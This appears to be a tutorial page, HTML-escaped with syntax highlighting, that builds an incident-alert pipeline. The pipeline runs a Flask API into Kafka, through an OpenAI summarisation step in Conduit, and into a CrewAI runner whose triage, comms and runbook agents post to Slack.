&lt;h3&gt;🧠 &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; (Conduit: Kafka → OpenAI → Kafka)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; incident&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;KAFKA_BOOTSTRAP_SERVER&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw_alerts

      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;out
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;KAFKA_BOOTSTRAP_SERVER&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; enriched_alerts

    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; summarize
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; openai.textgen
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;developer_message&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
            Summarize this alert and classify its urgency (low, medium, high).
            Format as JSON: {&quot;summary&quot;: &quot;...&quot;, &quot;urgency&quot;: &quot;...&quot;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; .Payload&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
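One thing worth noticing: the prompt above only asks the model for summary and urgency, while the CrewAI runner further down also requires an instance key, so the raw alerts posted to the API should carry one. A small sketch of the shape check the runner performs on each enriched alert (the function name is illustrative, not part of any of the services):

```python
import json

# Keys the CrewAI runner expects in every enriched alert.
REQUIRED_KEYS = {"summary", "urgency", "instance"}

def is_valid_enriched_alert(raw: bytes) -> bool:
    """Return True if the Kafka message decodes to a JSON object carrying all required keys."""
    try:
        alert = json.loads(raw.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return False
    return isinstance(alert, dict) and REQUIRED_KEYS.issubset(alert)

# A well-formed enriched alert passes; a partial one is rejected.
ok = is_valid_enriched_alert(b'{"summary": "DB down", "urgency": "high", "instance": "db-1"}')
bad = is_valid_enriched_alert(b'{"summary": "DB down"}')
```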
&lt;hr&gt;
&lt;h3&gt;🌐 &lt;code class=&quot;language-text&quot;&gt;alert_api/app.py&lt;/code&gt; (Flask → Kafka)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; flask &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Flask&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; request
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; kafka &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; KafkaProducer
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; logging

logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;basicConfig&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;level&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;INFO&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

producer &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; KafkaProducer&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    bootstrap_servers&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;KAFKA_BOOTSTRAP_SERVER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    value_serializer&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;lambda&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;dumps&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;encode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;utf-8&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

app &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Flask&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;__name__&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@app&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;route&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;/alert&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; methods&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;POST&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;alert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; request&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_json&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Received alert: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        producer&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;send&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;raw_alerts&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;status&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;ok&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;200&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Kafka send failed: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;500&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; __name__ &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;__main__&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    app&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;host&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;0.0.0.0&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; port&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;5000&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
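The producer's value_serializer here and the value_deserializer in the CrewAI runner below are two halves of one contract: JSON text encoded as UTF-8. A quick sketch of that round trip (the sample field names are illustrative, not prescribed by the API):

```python
import json

# Mirrors the Flask producer's value_serializer.
def serialize(v):
    return json.dumps(v).encode("utf-8")

# Mirrors the CrewAI runner's value_deserializer.
def deserialize(m):
    return json.loads(m.decode("utf-8"))

# Illustrative payload; any JSON object survives the round trip unchanged.
alert = {"service": "checkout", "instance": "web-1", "message": "High error rate"}
round_tripped = deserialize(serialize(alert))
```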
&lt;hr&gt;
&lt;h3&gt;🐳 &lt;code class=&quot;language-text&quot;&gt;alert_api/Dockerfile&lt;/code&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;docker&quot;&gt;&lt;pre class=&quot;language-docker&quot;&gt;&lt;code class=&quot;language-docker&quot;&gt;&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; python:3.10-slim&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;WORKDIR&lt;/span&gt; /app&lt;/span&gt;
&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;COPY&lt;/span&gt; app.py .&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;RUN&lt;/span&gt; pip install flask kafka-python&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CMD&lt;/span&gt; [&lt;span class=&quot;token string&quot;&gt;&quot;python&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;app.py&quot;&lt;/span&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
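Once the stack is up (docker compose up), a raw alert can be posted to the Flask API to exercise the whole pipeline; the payload fields here are illustrative:

```shell
curl -X POST http://localhost:5000/alert \
  -H "Content-Type: application/json" \
  -d '{"service": "checkout", "instance": "web-1", "message": "High error rate"}'
```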
&lt;h3&gt;🤖 CrewAI Runner&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; logging
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; kafka &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; KafkaConsumer
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; slack_sdk &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; WebClient
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; crewai &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Task&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Crew
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; slack_sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;errors &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SlackApiError
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; dotenv &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; load_dotenv

load_dotenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;basicConfig&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;level&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;INFO&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

slack &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; WebClient&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;token&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SLACK_BOT_TOKEN&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
channel &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SLACK_CHANNEL_ID&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;triage_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;🧠 Triage: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;summary&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; — *&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;urgency&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;medium&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;* urgency.&quot;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;comms_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;📢 Update: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;summary&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;. Engineers are investigating.&quot;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runbook_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;🔧 Restart `&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;instance&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;unknown&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;` using [Runbook #42](https://runbooks.myorg.dev/42).&quot;&lt;/span&gt;&lt;/span&gt;

triage_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;role&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;TriageBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Classify severity&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Knows alert patterns.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
comms_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;role&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CommsBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Write updates&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Keeps teams informed.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
runbook_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;role&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;RunbookBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Suggest fixes&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Knows infra patterns.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

tasks &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;description&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Triage alert&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; expected_output&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;An urgency assessment&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;triage_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;description&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Write Slack update&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; expected_output&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;A short status update&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;comms_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;description&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Suggest remediation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; expected_output&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;A remediation suggestion&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;runbook_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

